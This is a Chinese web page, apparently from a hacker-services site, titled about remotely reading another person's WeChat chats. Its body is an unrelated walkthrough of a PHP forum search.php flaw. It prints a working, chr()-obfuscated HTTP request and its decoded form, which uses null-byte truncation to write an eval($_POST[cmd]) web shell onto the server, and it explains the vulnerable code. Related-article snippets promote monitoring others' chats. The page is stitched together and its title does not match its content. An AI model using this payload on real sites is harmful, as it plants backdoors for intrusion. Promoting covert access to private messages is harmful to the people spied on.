如何远程查看别人微信(远程查看对象微信聊天

访客4年前关于黑客接单621

看到网上有类似的工具,但分析的文章却没找到,听小黑说黑客手册上有,可惜偶没有杂志,所以就抓包然后看下代码,大致分析了一下。这个漏洞很巧妙、也很经典 :) GET /search.php?keyword=By%20CN911&cachefile=an85.php%2500&treadinfo=〈?fputs(fop en(chr(46).chr(47).chr(46).chr(46).chr(47).chr(46).chr(46).chr(47).chr(98).chr(98).chr(115).chr(100).chr(97).chr(116).chr(97).chr(47).chr(99).chr(110).chr(57).chr(49).chr(49).chr(46).chr(112).chr(104).chr(112),w),chr(60).chr(63).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(59).chr(63).chr(62))?〉 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Accept-Language: zh-cn Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: 127.0.0.1 这是我抓包的文件,从抓包的文件里可以看出有三个变量:$keyword、$cachefile、$treadinfo。其中$keyword可以为任意关键字;$cachefile必须为一PHP文件,这个就是我们的PHP SHELL后面紧跟着%2500既为%00截断字符;$treadinfo就是生成木马的代码,我没解码,但猜测是把一句话木马写到另一个PHP文件的PHP代码。 PS:$treadinfo内容解码如下: &treadinfo=〈?fputs(fop en(./../../bbsdata/cn911.php,w),〈? eval($_POST[cmd]);?〉)?〉 好了以上就是抓包得到的分析 让我们看下seach.PHP的代码吧,找出漏洞具体在哪儿。 第N行代码如下: $keyword=safeconvert($keyword);//把一些字符过滤掉了$keyword=rawurldecode($keyword); $cachefile=rawurldecode($cachefile); rawurldecode 函数是对已编码的 URL 字符串进行解码,分别对$keyword和$cachefile进行URL 字符串进行解码。rawurldecode这个函数也是关键之一,%00 经过rawurldecode的包装后,在〈PHP5.0下可以饶过GPC=ON起到截断作用。 第N+N行代码如下 ..................... $keywordarray=explode("│",$keyword); $keycount=count($keywordarray); if($sch_area=="C"){ include’./require/schall.php’; }elseif($sch_area=="A"){ for ( $j = 0; $j 〈 $keycount; $j++){ $keywordarray[$j].="|";/*搜索作者准确匹配*/ } include’./require/schpart.php’; }else{ include’./require/schpart.php’; } if (!file_exists("userdata/cache/$cachefile.txt")){ showmsg("没 有 您 要 查 找 的 内 容 〈br〉〈br〉〈br〉〈a href=’search.php’〉继 续 搜 索〈/a〉〈/li〉〈/ul〉"); } ............................... 这里调用了schall.php或schpart.php文件,我们在看这个两个文件schall.php和schpart.php文件最后一行代码是: if($treadinfo) writeover("./userdata/cache/$cachefile.txt",$treadinfo,"ab"); 所以无论调用哪个文件都可以把treadinfo的内容写入缓存文件,因为变量$treadinfo没初始化,可以自定义SHELL代码,而$cachefile又可以自定义一个PHP文件,后面用%00截断TXT。所以这行代码就是把木马写到PHP文件中。 到此漏洞产生的大致过程已经比较明确了 由于本人在网吧看的代码,也没具体测试。其中有些细节没指出,如有错误请指出。也非常佩服漏洞发现者SAIY的观察力。确实是个非常经典的漏洞 :)

相关文章

假如忘掉手机微信的登陆密码,我该怎么做?

假如忘掉手机微信的登陆密码,我该怎么做?相信很多人都是密码忘了的亲身经历,怎样寻找遗失的手机微信?在这儿,大家将教你怎样寻找遗失的登陆密码,一起学习。...

怎么监控微信聊天记录吗(如何监视孩子微信聊天记录)

怎么监控微信聊天记录吗(如何监视孩子微信聊天记录)一月末的时候,一本黑发表了一篇《你的手机正在被人悄悄的监控,别人能看到屏幕显示的所有内容》的文章。 文章主要讲述一款监控软件,只要把这款软件安装在别...

佩塞芬妮黑客帝国(黑客帝国佩瑟芬图片)

佩塞芬妮黑客帝国(黑客帝国佩瑟芬图片)

本文导读目录: 1、黑3中给尼奥配音的是谁 黑3中给尼奥配音的是谁 基努.里维斯 饰尼奥配音 孙悦斌劳伦斯.菲什伯恩 饰墨菲斯配音 盖文革嘉丽.安妮.莫斯 饰崔妮蒂配音 廖 菁哈罗德.派瑞欧 饰林克...

文件夹如何上锁 怎样对文件夹设置密码

在电脑上,我们办公是会有一些文件夹是比如重要的,所以要把它们给保护不让其他人看到,我们就可以设置密码,这样没有密码就无法进行查看文件夹了,那么文件夹如何上锁呢,下面小编给大家分享对文件夹设置密码的...

黑客照明平板灯的价格(40wled平板照明灯)-如何快速在手机成为一名黑客

黑客照明平板灯的价格(40wled平板照明灯)-如何快速在手机成为一名黑客

黑客照明平板灯的价格(40wled平板照明灯)(tiechemo.com)一直致力于黑客(HACK)技术、黑客QQ群、信息安全、web安全、渗透运维、黑客工具、找黑客、黑客联系方式、24小时在线网络黑...

有什么方法能令我们快速长高?男生快速长高的方法有哪些

有什么方法能令我们快速长高?男生快速长高的方法有哪些

  对于男孩子来说总有高大挺拔的身材是很多男孩子非常渴望的事情,对于一些身材比较矮小的男性朋友那么如何能够快速增高呢,在下面文章中就给大家讲解了男生快速长高的几种方法,也许对你长高有一定的帮助...